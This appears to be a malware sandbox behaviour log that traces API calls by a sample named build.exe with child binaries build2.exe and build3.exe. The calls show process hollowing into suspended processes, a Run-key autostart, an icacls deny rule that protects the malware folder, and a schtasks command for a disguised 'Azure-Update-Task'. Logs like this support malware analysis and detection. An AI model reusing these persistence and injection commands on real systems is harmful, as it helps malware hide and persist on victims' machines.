protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000080
1 0 0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper reg_value "C:\Users\test22\AppData\Local\21585839-4b77-4562-86c9-65f44326d70f\build.exe" --AutoStart
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2084
process_handle: 0x00000080
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2420
process_handle: 0x00000080
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 1868
process_handle: 0x00000080
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2236
process_handle: 0x00000080
1 1 0
process build.exe useragent Microsoft Internet Explorer
process build2.exe useragent
Process injection Process 2428 called NtSetContextThread to modify thread in remote process 2084
Process injection Process 1760 called NtSetContextThread to modify thread in remote process 2420
Process injection Process 2620 called NtSetContextThread to modify thread in remote process 1868
Process injection Process 2076 called NtSetContextThread to modify thread in remote process 2236
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 2000355780
registers.esp: 1638384
registers.edi: 0
registers.eax: 4342081
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000007c
process_identifier: 2084
1 0 0

NtSetContextThread

registers.eip: 2000355780
registers.esp: 1638384
registers.edi: 0
registers.eax: 4342081
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000007c
process_identifier: 2420
1 0 0

NtSetContextThread

registers.eip: 2000355780
registers.esp: 1638384
registers.edi: 0
registers.eax: 4850477
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000007c
process_identifier: 1868
1 0 0

NtSetContextThread

registers.eip: 2000355780
registers.esp: 1638384
registers.edi: 0
registers.eax: 4201210
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000007c
process_identifier: 2236
1 0 0
Process injection Process 2428 resumed a thread in remote process 2084
Process injection Process 2084 resumed a thread in remote process 1760
Process injection Process 1760 resumed a thread in remote process 2420
Process injection Process 2620 resumed a thread in remote process 1868
Process injection Process 2076 resumed a thread in remote process 2236
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000007c
suspend_count: 1
process_identifier: 2084
1 0 0

NtResumeThread

thread_handle: 0x00000264
suspend_count: 1
process_identifier: 1760
1 0 0

NtResumeThread

thread_handle: 0x0000007c
suspend_count: 1
process_identifier: 2420
1 0 0

NtResumeThread

thread_handle: 0x0000007c
suspend_count: 1
process_identifier: 1868
1 0 0

NtResumeThread

thread_handle: 0x0000007c
suspend_count: 1
process_identifier: 2236
1 0 0
cmdline icacls "C:\Users\test22\AppData\Local\21585839-4b77-4562-86c9-65f44326d70f" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2276
thread_handle: 0x0000007c
process_identifier: 2084
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\build.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\build.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\build.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000080
1 1 0

NtGetContextThread

thread_handle: 0x0000007c
1 0 0

NtUnmapViewOfSection

base_address: 0x00400000
region_size: 4096
process_identifier: 2084
process_handle: 0x00000080
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 1273856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000080
1 0 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2084
process_handle: 0x00000080
1 1 0

NtSetContextThread

registers.eip: 2000355780
registers.esp: 1638384
registers.edi: 0
registers.eax: 4342081
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000007c
process_identifier: 2084
1 0 0

NtResumeThread

thread_handle: 0x0000007c
suspend_count: 1
process_identifier: 2084
1 0 0

CreateProcessInternalW

thread_identifier: 1048
thread_handle: 0x00000314
process_identifier: 2324
current_directory:
filepath:
track: 1
command_line: icacls "C:\Users\test22\AppData\Local\21585839-4b77-4562-86c9-65f44326d70f" /deny *S-1-1-0:(OI)(CI)(DE,DC)
filepath_r:
stack_pivoted: 0
creation_flags: 72 (DETACHED_PROCESS|IDLE_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000304
1 1 0

CreateProcessInternalW

thread_identifier: 2196
thread_handle: 0x00000264
process_identifier: 1760
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\build.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\build.exe" --Admin IsNotAutoStart IsNotTask
filepath_r: C:\Users\test22\AppData\Local\Temp\build.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000274
1 1 0

NtResumeThread

thread_handle: 0x00000264
suspend_count: 1
process_identifier: 1760
1 0 0

CreateProcessInternalW

thread_identifier: 2952
thread_handle: 0x0000007c
process_identifier: 2420
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\build.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\build.exe" --Admin IsNotAutoStart IsNotTask
filepath_r: C:\Users\test22\AppData\Local\Temp\build.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000080
1 1 0

NtGetContextThread

thread_handle: 0x0000007c
1 0 0

NtUnmapViewOfSection

base_address: 0x00400000
region_size: 4096
process_identifier: 2420
process_handle: 0x00000080
1 0 0

NtAllocateVirtualMemory

process_identifier: 2420
region_size: 1273856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000080
1 0 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2420
process_handle: 0x00000080
1 1 0

NtSetContextThread

registers.eip: 2000355780
registers.esp: 1638384
registers.edi: 0
registers.eax: 4342081
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000007c
process_identifier: 2420
1 0 0

NtResumeThread

thread_handle: 0x0000007c
suspend_count: 1
process_identifier: 2420
1 0 0

CreateProcessInternalW

thread_identifier: 2668
thread_handle: 0x00000298
process_identifier: 2620
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build2.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build2.exe"
filepath_r: C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build2.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000290
1 1 0

CreateProcessInternalW

thread_identifier: 1160
thread_handle: 0x000004bc
process_identifier: 2076
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build3.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build3.exe"
filepath_r: C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build3.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000004d0
1 1 0

CreateProcessInternalW

thread_identifier: 2032
thread_handle: 0x0000007c
process_identifier: 1868
current_directory:
filepath: C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build2.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build2.exe"
filepath_r: C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build2.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000080
1 1 0

NtGetContextThread

thread_handle: 0x0000007c
1 0 0

NtUnmapViewOfSection

base_address: 0x00400000
region_size: 4096
process_identifier: 1868
process_handle: 0x00000080
1 0 0

NtAllocateVirtualMemory

process_identifier: 1868
region_size: 880640
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000080
1 0 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 1868
process_handle: 0x00000080
1 1 0

NtSetContextThread

registers.eip: 2000355780
registers.esp: 1638384
registers.edi: 0
registers.eax: 4850477
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000007c
process_identifier: 1868
1 0 0

NtResumeThread

thread_handle: 0x0000007c
suspend_count: 1
process_identifier: 1868
1 0 0

CreateProcessInternalW

thread_identifier: 2252
thread_handle: 0x0000007c
process_identifier: 2236
current_directory:
filepath: C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build3.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build3.exe"
filepath_r: C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build3.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000080
1 1 0

NtGetContextThread

thread_handle: 0x0000007c
1 0 0

NtUnmapViewOfSection

base_address: 0x00400000
region_size: 4096
process_identifier: 2236
process_handle: 0x00000080
1 0 0

NtAllocateVirtualMemory

process_identifier: 2236
region_size: 24576
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000080
1 0 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2236
process_handle: 0x00000080
1 1 0

NtSetContextThread

registers.eip: 2000355780
registers.esp: 1638384
registers.edi: 0
registers.eax: 4201210
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000007c
process_identifier: 2236
1 0 0

NtResumeThread

thread_handle: 0x0000007c
suspend_count: 1
process_identifier: 2236
1 0 0

CreateProcessInternalW

thread_identifier: 2764
thread_handle: 0x000000ac
process_identifier: 3020
current_directory:
filepath: C:\Windows\System32\schtasks.exe
track: 1
command_line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe"
filepath_r: C:\Windows\System32\schtasks.exe
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x000000b0
1 1 0